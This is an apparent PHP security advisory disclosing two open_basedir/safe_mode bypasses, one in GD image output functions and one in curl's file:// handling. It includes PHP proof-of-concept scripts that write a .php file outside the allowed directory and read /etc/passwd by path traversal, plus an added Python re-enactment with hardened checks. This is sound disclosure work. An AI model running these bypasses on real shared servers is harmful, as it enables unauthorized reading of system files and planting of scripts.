A safedir restriction bypass has been identified within the GD PHP extension.
There is a vulnerability (safedir restriction bypass) in the GD extension affecting
the following functions:
- imagegif()
- imagepng()
- imagejpeg()
in /ext/gd/gd.c line 1647: the output filename given to these functions is opened
without first being run through the safe_mode / open_basedir check, so a script can
write its image to a path outside the directory it is confined to (the PoC below
writes a .php file there).
This is now fixed in CVS:
http://cvs.php.net/co.php/php-src/ext/gd/gd.c?r=1.312.2.1#1786
POC:
With an image like http://81.57.125.106/~slythers/file.gif:

<?php
$im = imagecreatefromgif("file.gif");
// Output path lies outside this script's open_basedir; GD opens it without the check.
imagegif($im, '/var/www/f34r.fr/c/f/elbossoso/.i.need.money.php');
?>
curl open_basedir and safe_mode bypass.
POC:

<?php
// Create a directory named "<script>?" inside the allowed area. PHP's check parses
// the file:// URL and treats everything from '?' on as a query string, so it only
// validates "<script>" and approves it; libcurl's file:// handler does not treat
// '?' specially and opens the whole string, which the directory makes resolvable.
mkdir("./".$_SERVER["SCRIPT_NAME"]."?");
$ch = curl_init("file://".$_SERVER["SCRIPT_FILENAME"]."?/../../../../../../../../../../../etc/passwd");
// Return the body instead of printing it directly, so $file holds the contents.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$file = curl_exec($ch);
echo $file;
?>
As the PoC shows, the safedir restriction can be bypassed, which on a shared server
gives a script read access to files outside its own open_basedir (anything the web
server's user can read).
This is fixed in CVS.
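Both bugs have the same shape: the path that gets checked is not the path that gets opened. The following Python model is added here and is not part of the advisory, of PHP or of libcurl; it re-enacts the GD case (output file opened with no open_basedir check at all) and the curl case (check run on the parsed file:// URL, which stops at '?', while the raw string is what libcurl opens), including why the mkdir of a "<script>?" directory is needed. The function names, the temporary directory layout and the stand-in passwd line are constructed assumptions; check_open_basedir() is a model of php_check_open_basedir(), not its code.

```python
# Added example (not part of the advisory): a Python model of the open_basedir
# logic the two bugs get wrong. PHP's check, php_check_open_basedir(), resolves
# the candidate path and requires it to sit under a configured base directory.
# Assumptions: the function names and the temp directory layout are ours; this
# re-enacts the behaviour the advisory describes, it is not PHP's or libcurl's code.
import os
import tempfile
from urllib.parse import urlparse


def check_open_basedir(path, basedirs):
    """Model of php_check_open_basedir(): realpath(), then a basedir prefix test."""
    real = os.path.realpath(path)
    for base in basedirs:
        base_real = os.path.realpath(base).rstrip(os.sep) + os.sep
        if (real + os.sep).startswith(base_real):
            return True
    return False


# --- GD: imagegif()/imagepng()/imagejpeg() wrote the output file with no check at all.
def gd_write_unchecked(out_path, data):
    """Vulnerable behaviour: open whatever filename the script passes."""
    with open(out_path, "wb") as f:
        f.write(data)
    return True


def gd_write_checked(out_path, data, basedirs):
    """Fixed behaviour: refuse before the open when the path leaves open_basedir."""
    if not check_open_basedir(out_path, basedirs):
        return False
    with open(out_path, "wb") as f:
        f.write(data)
    return True


# --- curl: the check was done on a parsed URL, the open on the raw one.
def libcurl_file_read(url):
    """Model of libcurl's file:// handler: the path is everything after 'file://'; '?' is not special."""
    path = url[len("file://"):]
    with open(path, "rb") as f:
        return f.read()


def curl_read_check_on_parsed_path(url, basedirs):
    """Vulnerable pattern: urlparse() stops the path at '?', so only the prefix is checked."""
    parsed = urlparse(url)
    if parsed.scheme != "file" or not check_open_basedir(parsed.path, basedirs):
        return None
    return libcurl_file_read(url)


def curl_read_hardened(url, basedirs):
    """Check exactly the string the consumer will open, not a parsed view of it."""
    if not url.startswith("file://"):
        return None
    if not check_open_basedir(url[len("file://"):], basedirs):
        return None
    return libcurl_file_read(url)


def demo():
    """Re-enact both bugs in a constructed temp layout; returns a dict of outcomes."""
    root = tempfile.mkdtemp()
    www = os.path.join(root, "www")            # open_basedir for this "vhost"
    os.makedirs(www)
    secret = os.path.join(root, "secret.txt")  # outside open_basedir
    with open(secret, "wb") as f:
        f.write(b"root:x:0:0:root:/root:/bin/sh\n")  # constructed stand-in for /etc/passwd
    basedirs = [www]
    out = {}

    # GD: write "image" data to a .php file outside the base directory.
    target = os.path.join(root, "dropped.php")
    out["gd_unchecked_wrote_outside"] = gd_write_unchecked(target, b"<?php ?>") and os.path.exists(target)
    os.remove(target)
    out["gd_checked_blocked"] = gd_write_checked(target, b"<?php ?>", basedirs) is False and not os.path.exists(target)

    # curl: the '?' trick. Without the mkdir the kernel cannot descend into "script.php?".
    script_q = os.path.join(www, "script.php?")
    url = "file://" + script_q + "/../../secret.txt"
    try:
        libcurl_file_read(url)
        out["curl_without_mkdir_fails"] = False
    except OSError:  # ENOENT / ENOTDIR: "script.php?" does not exist as a directory yet
        out["curl_without_mkdir_fails"] = True

    os.mkdir(script_q)  # the advisory's mkdir("./".$_SERVER["SCRIPT_NAME"]."?")
    leaked = curl_read_check_on_parsed_path(url, basedirs)
    out["curl_parsed_check_leaked"] = leaked is not None and leaked.startswith(b"root:")
    out["curl_hardened_blocked"] = curl_read_hardened(url, basedirs) is None
    return out


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```

The hardened curl variant is the general rule: validate the exact byte string that will reach open(), after the same normalisation the consumer applies, rather than a parsed or re-encoded view of it; any parser differential between the checker and the consumer becomes a bypass.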
slythers@gmail.com
greets: david coallier <davidc@php.net>